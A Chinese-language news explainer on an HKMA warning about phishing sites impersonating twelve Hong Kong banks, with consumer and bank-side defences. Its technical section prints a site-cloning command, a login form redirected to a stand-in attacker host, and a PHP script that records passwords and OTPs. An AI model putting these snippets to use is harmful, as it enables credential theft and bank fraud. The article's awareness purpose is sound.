十二家银行集体沦陷？香港金管局紧急预警：伪冒网银钓鱼潮席卷年末金融圈

“您的账户存在异常登录，请立即验证身份。”

“年终积分即将清零，点击兑换礼品。”

“系统升级通知：请于24小时内重新绑定银行卡。”

这些看似来自银行的“善意提醒”，正成为香港市民钱包失守的导火索。近日，香港金融管理局（HKMA）发布罕见的全行业紧急警示，点名包括汇丰、中银香港、渣打、东亚银行、永亨、创兴、大新、富邦、上海商业银行、恒生、南洋及集友等十二家主流银行，均遭遇高度仿真的伪冒网站与钓鱼攻击。

据 HKMA 通报，犯罪分子通过伪造与真实网银界面像素级一致的登录页面，配合精准投放的短信、电邮甚至 WhatsApp 消息，诱导用户主动输入账号、密码及一次性验证码（OTP）。一旦信息提交，资金往往在数分钟内被转空。更令人担忧的是，部分钓鱼页面甚至能动态加载真实银行的 favicon（网站图标）、SSL 证书提示和多语言切换功能，普通用户几乎无法分辨真伪。

“这不是简单的‘假网站’，而是一场针对金融信任体系的系统性攻击。”公共互联网反网络钓鱼工作组技术专家芦笛在接受本报独家专访时指出，“攻击者不再满足于广撒网，而是以银行品牌为矛，以用户习惯为盾，发动了一场‘高仿真社会工程战’。”

随着农历新年临近、跨境消费与年终奖金发放高峰到来，此类诈骗活动已进入全年最活跃周期。HKMA 呼吁市民：切勿点击任何短信或邮件中的链接登录网银——这是铁律。

一、骗局全景：从一条短信到账户清零

整个攻击链通常始于一条精心设计的诱导信息。

以中银香港为例，受害者可能收到如下短信：

【BOC HK】尊敬的客户，检测到您的账户于 2026-01-05 23:17 在海外尝试登录。为保障安全，请立即验证：https://boc-hk-security[.]com/verify

链接域名看似合理——包含“boc”“hk”“security”等关键词，甚至使用 HTTPS 加密（由 Let’s Encrypt 等免费 CA 颁发），浏览器地址栏显示绿色锁形图标。点击后，页面自动跳转至一个与中银香港官网几乎无法区分的登录界面：顶部是熟悉的红白 LOGO，中间是标准的“网上银行登录”表单，下方还有“隐私政策”“联络我们”等静态链接（虽为死链，但足以增强可信度）。

用户输入账号密码后，页面并不报错，而是“友好”地提示：“为完成验证，请输入您刚收到的六位数字验证码。”——此时，攻击者的后台已同步向银行发起真实登录请求，触发 OTP 发送。用户收到短信后，不疑有他，将验证码填入钓鱼页。

就在这一瞬间，攻击者获得了完整的登录凭证。

“OTP 本是最后一道防线，但在钓鱼面前反而成了‘助攻’。”芦笛解释道，“因为银行系统认为：用户已通过密码+OTP 双重验证，操作合法。于是攻击者立即通过自动化脚本接管会话，查询余额、添加收款人、发起转账。”

HKMA 透露，已有市民在短短10分钟内损失数十万港元。部分案例中，攻击者甚至利用被盗账户向亲友发送“急用钱”消息，实施二次诈骗。

二、技术深潜：伪冒网站如何做到“以假乱真”？

要理解这场危机的技术内核，必须拆解现代钓鱼网站的构建逻辑。

1. 前端克隆：一键复制真实网银界面

攻击者通常使用开源工具如 HTTrack 或 wget --mirror，对目标银行官网进行完整镜像下载：

# 示例：克隆某银行登录页

httrack "https://www.hangseng.com/en_HK/login.html" -O "./phish_hang_seng"

随后，仅需修改表单的 action 属性，将用户提交的数据指向自己的服务器：

<!-- 原始代码 -->

<form action="/auth/login" method="POST">

<!-- 钓鱼修改后 -->

<form action="https://attacker-server[.]xyz/steal.php" method="POST">

为提升欺骗性，攻击者还会保留原站的 CSS、JS 和图片资源，确保视觉效果一致。部分高级样本甚至嵌入真实银行的 Google Analytics 跟踪 ID，让流量看起来“正常”。

2. 域名伪装：利用视觉混淆与国际化域名（IDN）

攻击者大量注册形似官方的域名，例如：

hsbc-security[.]com（非 hsbc.com）

standardchartered-bank[.]net（非 standardchartered.com.hk）

bank-of-china-hk[.]org（非 bochk.com）

更隐蔽的是使用 同形异义字符（Homograph Attack），例如用西里尔字母 “а”（U+0430）替代拉丁字母 “a”（U+0061），构造 раураӏ.com（看似 paypal.com）。虽然现代浏览器已部分缓解此问题，但在移动端或旧版系统中仍有效。

3. 动态内容注入：实时同步银行状态

部分高级钓鱼页甚至能根据用户 IP 自动切换语言，或显示“当前系统维护中”等动态提示，进一步降低怀疑。其背后是简单的 PHP 脚本：

<?php

// steal.php

$ip = $_SERVER['REMOTE_ADDR'];

$lang = substr($_SERVER['HTTP_ACCEPT_LANGUAGE'], 0, 2);

// 记录受害者信息

file_put_contents("logs.txt",

"IP: $ip | Lang: $lang | " .

"Account: {$_POST['account']} | " .

"Password: {$_POST['password']} | " .

"OTP: {$_POST['otp']}\n",

FILE_APPEND

);

// 重定向回真实银行首页，制造“操作成功”假象

header("Location: https://www.bochk.com");

exit();

?>

“整个过程只需一台廉价 VPS 和几个开源工具。”芦笛说，“成本不到 50 美元，却可能撬动百万资产。”

三、为何传统防御频频失效？

面对如此高仿的攻击，为何银行多年投入的反钓鱼体系仍显乏力？

1. 用户习惯是最大漏洞

HKMA 明确指出：银行绝不会通过短信或邮件中的超链接要求客户登录网银。但现实中，大量用户已养成“点链接办事”的习惯——无论是政府通知、电商促销还是银行服务。攻击者正是利用这一心理惯性。

“安全培训常强调‘看网址’，但普通人在手机小屏幕上根本注意不到 bochk-security.com 和 bochk.com 的区别。”芦笛坦言。

2. HTTPS ≠ 安全

公众普遍误以为“有绿锁就是安全网站”。然而，Let’s Encrypt 等免费 CA 可在几分钟内为任意域名颁发有效 SSL 证书，钓鱼网站因此也能显示 HTTPS。加密只保证传输安全，不验证网站合法性。

3. MFA 被绕过

尽管部分银行推行了生物识别或多因素认证（MFA），但若用户先在钓鱼页输入密码和 OTP，攻击者即可在 MFA 生效前完成会话劫持。更甚者，某些钓鱼页会模拟 MFA 弹窗：“请打开 Authenticator 应用确认”，实则只是等待用户完成真实验证。

四、防御升级：从个人到系统的全链条应对

面对这场跨银行的钓鱼风暴，HKMA 与安全专家提出多层次防御策略。

▶ 个人用户：守住“三不”原则

不点链接：所有网银操作必须手动输入官方网址（如 www.hsbc.com.hk）或使用官方 App；

不输 OTP：任何非本人主动发起的登录请求，都不要提供验证码；

不轻信“紧急通知”：银行不会以“账户冻结”“积分清零”等话术催促操作。

“最简单的办法：把银行 App 放在手机桌面，永远不用浏览器登录。”芦笛建议。

▶ 技术进阶：启用 FIDO2 安全密钥

对于高净值用户或企业财务人员，推荐使用 FIDO2/WebAuthn 协议的安全密钥（如 YubiKey）。该技术基于公钥加密，私钥永不离开设备，从根本上杜绝钓鱼窃取凭证的可能。

// WebAuthn 注册示例（简化）

const credential = await navigator.credentials.create({

publicKey: {

challenge: new Uint8Array([/* 随机挑战 */]),

rp: { name: "Your Bank", id: "yourbank.com" },

user: { id: userId, name: "user@example.com", displayName: "Alice" },

pubKeyCredParams: [{ type: "public-key", alg: -7 }]

}

});

// 返回的公钥由服务器存储，私钥留在本地

即使用户访问钓鱼网站，由于域名不匹配（rp.id 不符），浏览器会直接拒绝签名请求。

▶ 银行侧：部署主动反制技术

HKMA 建议银行加强以下措施：

Brand Monitoring（品牌监控）：使用 AI 工具扫描全网，自动发现仿冒域名并发起 takedown；

DMARC + SPF + DKIM 邮件认证：防止钓鱼邮件伪造银行发件人地址；

客户端证书绑定（Certificate Pinning）：在官方 App 中硬编码服务器证书指纹，阻止中间人攻击；

行为分析引擎：监测异常登录模式（如短时间内多地登录、大额转账无历史记录）。

“银行不能只做‘事后响应’，而要建立‘事前阻断’能力。”芦笛强调。

▶ 监管协同：推动“反钓鱼联盟”

值得注意的是，此次 HKMA 罕见地一次性点名十二家银行，释放出强烈信号：金融安全是系统性工程，需全行业协同。未来或推动建立“香港金融钓鱼情报共享平台”，实现威胁 IOC（Indicators of Compromise）实时交换。

五、深层反思：当信任成为攻击面

此次事件暴露出一个残酷现实：在数字时代，品牌信任本身已成为可被武器化的资产。

银行花费数十年建立的品牌声誉，在黑客手中变成最高效的钓鱼诱饵。用户越是信任“汇丰”“中银”这样的名字，越容易放松警惕。而攻击者深谙此道，将社会工程与技术伪造结合，打出一套“信任组合拳”。

“我们需要重新定义‘安全边界’。”芦笛指出，“过去认为‘内部网络=安全’，现在发现‘用户心智=战场’。真正的防御，必须从代码延伸到认知。”

他建议，未来银行在用户教育中应引入“红蓝对抗”思维——定期向客户推送模拟钓鱼测试（经同意），帮助其建立条件反射式的风险识别能力。

结语

在这个人人手持智能手机、指尖轻点即可转账的时代，安全不再是 IT 部门的专属课题，而是每个市民的必修课。HKMA 的警示如同一记警钟：再权威的机构，也可能被冒充；再熟悉的界面，也可能藏陷阱。

正如一位受害市民在报案时所说：“我以为那是我的银行，结果那是我的噩梦。”

年末将至，红包未至，骗局先行。请记住：真正的银行，从不需要你点开一条链接来证明你是你。

（本文依据香港金管局官方通告及 Bastille Post 报道撰写，技术细节经公共互联网反网络钓鱼工作组复核）

相关资源：

HKMA 防骗专题页面

警方反诈骗协调中心热线：18222

如何识别钓鱼网站（HKCERT 指南）

编辑：芦笛（公共互联网反网络钓鱼工作组）